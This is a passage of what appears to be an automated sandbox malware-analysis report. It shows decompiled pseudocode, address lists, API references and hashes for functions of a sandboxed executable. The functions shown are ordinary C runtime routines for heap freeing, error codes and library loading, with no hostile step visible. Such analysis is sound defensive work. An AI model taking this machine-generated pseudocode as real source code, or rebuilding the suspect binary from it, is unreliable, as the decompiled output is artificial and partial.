                                                                                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_push(_t10);
                                                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                                                      						E0118A6DA();
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						SetLastError(_t17);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t16 = E0118A8D7(_t11, _t17, _t20, _t2);
                                                                                                                                                                                                                                                                      					if(_t16 != 0) {
                                                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                                                      						SetLastError(_t17);
                                                                                                                                                                                                                                                                      						_t10 = _t16;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t10;
                                                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                                                      0x01189cb4
                                                                                                                                                                                                                                                                      0x01189cbf
                                                                                                                                                                                                                                                                      0x01189cc1
                                                                                                                                                                                                                                                                      0x01189cc3
                                                                                                                                                                                                                                                                      0x01189cc8
                                                                                                                                                                                                                                                                      0x01189ccb
                                                                                                                                                                                                                                                                      0x01189cd9
                                                                                                                                                                                                                                                                      0x01189ce5
                                                                                                                                                                                                                                                                      0x01189ce8
                                                                                                                                                                                                                                                                      0x01189ceb
                                                                                                                                                                                                                                                                      0x01189cfd
                                                                                                                                                                                                                                                                      0x01189d02
                                                                                                                                                                                                                                                                      0x01189d04
                                                                                                                                                                                                                                                                      0x01189d0f
                                                                                                                                                                                                                                                                      0x01189d15
                                                                                                                                                                                                                                                                      0x01189d1d
                                                                                                                                                                                                                                                                      0x01189d1f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189d06
                                                                                                                                                                                                                                                                      0x01189d06
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189d06
                                                                                                                                                                                                                                                                      0x01189ced
                                                                                                                                                                                                                                                                      0x01189ced
                                                                                                                                                                                                                                                                      0x01189cee
                                                                                                                                                                                                                                                                      0x01189cee
                                                                                                                                                                                                                                                                      0x01189d21
                                                                                                                                                                                                                                                                      0x01189d22
                                                                                                                                                                                                                                                                      0x01189d22
                                                                                                                                                                                                                                                                      0x01189ccd
                                                                                                                                                                                                                                                                      0x01189cd3
                                                                                                                                                                                                                                                                      0x01189cd7
                                                                                                                                                                                                                                                                      0x01189d2a
                                                                                                                                                                                                                                                                      0x01189d2b
                                                                                                                                                                                                                                                                      0x01189d31
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01189cd7
                                                                                                                                                                                                                                                                      0x01189d38

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0118982B,0118A6CF,?,01189C5E,00000001,00000364,?,01184B88,?), ref: 01189CB9
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189CEE
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189D15
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 01189D22
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 01189D2B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                      • Opcode ID: 9689ab4ef844008d372091a5c555399e91bc38baf2e46a33f71465edfe369bf9
                                                                                                                                                                                                                                                                      • Instruction ID: dc2447d536136d2421ccb80937bd0375df6c293aed7f6112d66a208390c6bb7e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9689ab4ef844008d372091a5c555399e91bc38baf2e46a33f71465edfe369bf9
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96012B3610430D67921E75647C4893E325DDFE21BD331C229F52593180FF6184018960
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118BB90(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                                                                                      					_t23 =  *_t21 -  *0x121dd10; // 0x121dd08
                                                                                                                                                                                                                                                                      					if(_t23 != 0) {
                                                                                                                                                                                                                                                                      						E0118A6DA(_t7);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x121dd14; // 0x121e181
                                                                                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                                                                                      						E0118A6DA(_t8);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x121dd18; // 0x121e181
                                                                                                                                                                                                                                                                      					if(_t25 != 0) {
                                                                                                                                                                                                                                                                      						E0118A6DA(_t9);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x121dd40; // 0x121dd0c
                                                                                                                                                                                                                                                                      					if(_t26 != 0) {
                                                                                                                                                                                                                                                                      						E0118A6DA(_t10);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                                                      					_t27 = _t6 -  *0x121dd44; // 0x121e184
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						return E0118A6DA(_t6);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t6;
                                                                                                                                                                                                                                                                      			}










                                                                                                                                                                                                                                                                      0x0118bb96
                                                                                                                                                                                                                                                                      0x0118bb9b
                                                                                                                                                                                                                                                                      0x0118bb9f
                                                                                                                                                                                                                                                                      0x0118bba5
                                                                                                                                                                                                                                                                      0x0118bba8
                                                                                                                                                                                                                                                                      0x0118bbad
                                                                                                                                                                                                                                                                      0x0118bbb1
                                                                                                                                                                                                                                                                      0x0118bbb7
                                                                                                                                                                                                                                                                      0x0118bbba
                                                                                                                                                                                                                                                                      0x0118bbbf
                                                                                                                                                                                                                                                                      0x0118bbc3
                                                                                                                                                                                                                                                                      0x0118bbc9
                                                                                                                                                                                                                                                                      0x0118bbcc
                                                                                                                                                                                                                                                                      0x0118bbd1
                                                                                                                                                                                                                                                                      0x0118bbd5
                                                                                                                                                                                                                                                                      0x0118bbdb
                                                                                                                                                                                                                                                                      0x0118bbde
                                                                                                                                                                                                                                                                      0x0118bbe3
                                                                                                                                                                                                                                                                      0x0118bbe4
                                                                                                                                                                                                                                                                      0x0118bbe7
                                                                                                                                                                                                                                                                      0x0118bbed
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118bbf5
                                                                                                                                                                                                                                                                      0x0118bbed
                                                                                                                                                                                                                                                                      0x0118bbf8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BBA8
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: HeapFree.KERNEL32(00000000,00000000,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?), ref: 0118A6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: GetLastError.KERNEL32(?,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?,?), ref: 0118A702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BBBA
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BBCC
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BBDE
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BBF0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: c6c96beaa236b98d3ec70aab4555ed3671a53bf05c02c4955fcf30816374e0c2
                                                                                                                                                                                                                                                                      • Instruction ID: 7e313cf8a308536eb5a2b90c17306ede362238ba6426ada39b1f2bb8b91d6fb0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6c96beaa236b98d3ec70aab4555ed3671a53bf05c02c4955fcf30816374e0c2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F0FF33508215EB963CFA98F689C1A77D9BF647947B48806E509D7908CB35F8808EA8
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                                                                                      			E0119160F(signed int __ecx) {
                                                                                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                      				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                      					_t7 =  *0x121dd00; // 0x1362bf0
                                                                                                                                                                                                                                                                      					if(_t7 != 0x121dae0) {
                                                                                                                                                                                                                                                                      						E0118A6DA(_t7);
                                                                                                                                                                                                                                                                      						 *0x121dd00 = 0x121dae0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E0118A6DA( *0x121ea34);
                                                                                                                                                                                                                                                                      				 *0x121ea34 = 0;
                                                                                                                                                                                                                                                                      				E0118A6DA( *0x121ea38);
                                                                                                                                                                                                                                                                      				 *0x121ea38 = 0;
                                                                                                                                                                                                                                                                      				E0118A6DA( *0x121e818);
                                                                                                                                                                                                                                                                      				 *0x121e818 = 0;
                                                                                                                                                                                                                                                                      				E0118A6DA( *0x121e81c);
                                                                                                                                                                                                                                                                      				 *0x121e81c = 0;
                                                                                                                                                                                                                                                                      				return 1;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x01191618
                                                                                                                                                                                                                                                                      0x0119161c
                                                                                                                                                                                                                                                                      0x0119161e
                                                                                                                                                                                                                                                                      0x0119162a
                                                                                                                                                                                                                                                                      0x0119162d
                                                                                                                                                                                                                                                                      0x01191633
                                                                                                                                                                                                                                                                      0x01191633
                                                                                                                                                                                                                                                                      0x0119162a
                                                                                                                                                                                                                                                                      0x0119163f
                                                                                                                                                                                                                                                                      0x0119164c
                                                                                                                                                                                                                                                                      0x01191652
                                                                                                                                                                                                                                                                      0x0119165d
                                                                                                                                                                                                                                                                      0x01191663
                                                                                                                                                                                                                                                                      0x0119166e
                                                                                                                                                                                                                                                                      0x01191674
                                                                                                                                                                                                                                                                      0x0119167c
                                                                                                                                                                                                                                                                      0x01191685

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0119162D
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: HeapFree.KERNEL32(00000000,00000000,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?), ref: 0118A6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: GetLastError.KERNEL32(?,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?,?), ref: 0118A702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0119163F
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01191652
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01191663
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01191674
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: e920b71d1a6fbf683b55f6a412226ad32781ad566bf5d97dcd6d45a12844f7f7
                                                                                                                                                                                                                                                                      • Instruction ID: 1c81dc3cb0325b8d57d8c50c460471429f0d593291849a649aae69582a4d7cd7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e920b71d1a6fbf683b55f6a412226ad32781ad566bf5d97dcd6d45a12844f7f7
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F017B6804121AF9A2AEF68BC494157BA4BB747A83668117FC115366CCF320982DFC9
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                                                                                      			E01190FD5(intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr* _t35;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                                                                      				intOrPtr* _t43;
                                                                                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                                                                                      				WCHAR* _t48;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t49;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                                      					GetModuleFileNameW(0, 0x121e5f0, 0x104);
                                                                                                                                                                                                                                                                      					_t48 =  *0x121e824; // 0x1351c40
                                                                                                                                                                                                                                                                      					 *0x121e828 = 0x121e5f0;
                                                                                                                                                                                                                                                                      					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                                                                                                                                                                                                      						_t48 = 0x121e5f0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                                                                                      					_v16 = 0;
                                                                                                                                                                                                                                                                      					E011910F4(_t48, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                      					_t61 = E0119127A(_v8, _v16, 2);
                                                                                                                                                                                                                                                                      					if(_t61 != 0) {
                                                                                                                                                                                                                                                                      						E011910F4(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                      						if(_a4 != 1) {
                                                                                                                                                                                                                                                                      							_v12 = 0;
                                                                                                                                                                                                                                                                      							_push( &_v12);
                                                                                                                                                                                                                                                                      							_t49 = E01191CBE(_t48, 0, _t61, _t61);
                                                                                                                                                                                                                                                                      							if(_t49 == 0) {
                                                                                                                                                                                                                                                                      								_t56 = _v12;
                                                                                                                                                                                                                                                                      								_t53 = 0;
                                                                                                                                                                                                                                                                      								_t35 = _t56;
                                                                                                                                                                                                                                                                      								if( *_t56 == 0) {
                                                                                                                                                                                                                                                                      									L15:
                                                                                                                                                                                                                                                                      									_t36 = 0;
                                                                                                                                                                                                                                                                      									 *0x121e814 = _t53;
                                                                                                                                                                                                                                                                      									_v12 = 0;
                                                                                                                                                                                                                                                                      									_t49 = 0;
                                                                                                                                                                                                                                                                      									 *0x121e81c = _t56;
                                                                                                                                                                                                                                                                      									L16:
                                                                                                                                                                                                                                                                      									E0118A6DA(_t36);
                                                                                                                                                                                                                                                                      									_v12 = 0;
                                                                                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                                                      									L14:
                                                                                                                                                                                                                                                                      									_t35 = _t35 + 4;
                                                                                                                                                                                                                                                                      									_t53 =  &(_t53->i);
                                                                                                                                                                                                                                                                      								} while ( *_t35 != 0);
                                                                                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t36 = _v12;
                                                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *0x121e814 = _v8 - 1;
                                                                                                                                                                                                                                                                      						_t42 = _t61;
                                                                                                                                                                                                                                                                      						_t61 = 0;
                                                                                                                                                                                                                                                                      						 *0x121e81c = _t42;
                                                                                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t43 = E01189826();
                                                                                                                                                                                                                                                                      						_push(0xc);
                                                                                                                                                                                                                                                                      						_pop(0);
                                                                                                                                                                                                                                                                      						 *_t43 = 0;
                                                                                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                                                                                      						_t49 = 0;
                                                                                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                                                                                      						E0118A6DA(_t61);
                                                                                                                                                                                                                                                                      						return _t49;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t44 = E01189826();
                                                                                                                                                                                                                                                                      					_t62 = 0x16;
                                                                                                                                                                                                                                                                      					 *_t44 = _t62;
                                                                                                                                                                                                                                                                      					E0118976A();
                                                                                                                                                                                                                                                                      					return _t62;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}




















                                                                                                                                                                                                                                                                      0x01190fe2
                                                                                                                                                                                                                                                                      0x01191010
                                                                                                                                                                                                                                                                      0x01191016
                                                                                                                                                                                                                                                                      0x0119101c
                                                                                                                                                                                                                                                                      0x01191024
                                                                                                                                                                                                                                                                      0x0119102b
                                                                                                                                                                                                                                                                      0x0119102b
                                                                                                                                                                                                                                                                      0x01191030
                                                                                                                                                                                                                                                                      0x01191037
                                                                                                                                                                                                                                                                      0x0119103e
                                                                                                                                                                                                                                                                      0x01191050
                                                                                                                                                                                                                                                                      0x01191057
                                                                                                                                                                                                                                                                      0x01191076
                                                                                                                                                                                                                                                                      0x01191082
                                                                                                                                                                                                                                                                      0x0119109d
                                                                                                                                                                                                                                                                      0x011910a0
                                                                                                                                                                                                                                                                      0x011910a7
                                                                                                                                                                                                                                                                      0x011910ad
                                                                                                                                                                                                                                                                      0x011910b4
                                                                                                                                                                                                                                                                      0x011910b7
                                                                                                                                                                                                                                                                      0x011910b9
                                                                                                                                                                                                                                                                      0x011910bd
                                                                                                                                                                                                                                                                      0x011910c7
                                                                                                                                                                                                                                                                      0x011910c7
                                                                                                                                                                                                                                                                      0x011910c9
                                                                                                                                                                                                                                                                      0x011910cf
                                                                                                                                                                                                                                                                      0x011910d2
                                                                                                                                                                                                                                                                      0x011910d4
                                                                                                                                                                                                                                                                      0x011910da
                                                                                                                                                                                                                                                                      0x011910db
                                                                                                                                                                                                                                                                      0x011910e1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011910bf
                                                                                                                                                                                                                                                                      0x011910bf
                                                                                                                                                                                                                                                                      0x011910bf
                                                                                                                                                                                                                                                                      0x011910c2
                                                                                                                                                                                                                                                                      0x011910c3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011910bf
                                                                                                                                                                                                                                                                      0x011910af
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011910af
                                                                                                                                                                                                                                                                      0x01191088
                                                                                                                                                                                                                                                                      0x0119108d
                                                                                                                                                                                                                                                                      0x0119108f
                                                                                                                                                                                                                                                                      0x01191091
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01191059
                                                                                                                                                                                                                                                                      0x01191059
                                                                                                                                                                                                                                                                      0x0119105e
                                                                                                                                                                                                                                                                      0x01191060
                                                                                                                                                                                                                                                                      0x01191061
                                                                                                                                                                                                                                                                      0x01191096
                                                                                                                                                                                                                                                                      0x01191096
                                                                                                                                                                                                                                                                      0x011910e4
                                                                                                                                                                                                                                                                      0x011910e5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011910ee
                                                                                                                                                                                                                                                                      0x01190fea
                                                                                                                                                                                                                                                                      0x01190fea
                                                                                                                                                                                                                                                                      0x01190ff1
                                                                                                                                                                                                                                                                      0x01190ff2
                                                                                                                                                                                                                                                                      0x01190ff4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01190ff9

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PIyT9A3jfC.exe,00000104), ref: 01191010
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 011910DB
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 011910E5
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                      • API String ID: 2506810119-497105609
                                                                                                                                                                                                                                                                      • Opcode ID: 0d9a823e347b712b81f953a1a2a7d3e8727b854669cb829e358001c00514f813
                                                                                                                                                                                                                                                                      • Instruction ID: 1fd7234b85d81a25ff15ac175c43a9d9721e60b9f16eb703fc6b097f879f2a25
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d9a823e347b712b81f953a1a2a7d3e8727b854669cb829e358001c00514f813
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C731D771B0024AFFDF2ADF99D88489EBBFCEB94364B158066E91497200D7715A80CB91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E0118A7B0(signed int _a4) {
                                                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                                                                                      				WCHAR* _t22;
                                                                                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t9 = _a4;
                                                                                                                                                                                                                                                                      				_t25 = 0x121df50 + _t9 * 4;
                                                                                                                                                                                                                                                                      				_t24 =  *_t25;
                                                                                                                                                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                                                                                                                                                      					_t22 =  *(0x11d6c50 + _t9 * 4);
                                                                                                                                                                                                                                                                      					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						 *_t25 = _t27;
                                                                                                                                                                                                                                                                      						if( *_t25 != 0) {
                                                                                                                                                                                                                                                                      							FreeLibrary(_t27);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t13 = _t27;
                                                                                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                                                                                      						return _t13;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t15 = GetLastError();
                                                                                                                                                                                                                                                                      					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                                      						_t27 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                                      						_t27 = _t15;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						goto L8;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                                      						_t13 = 0;
                                                                                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                                                                                      					}
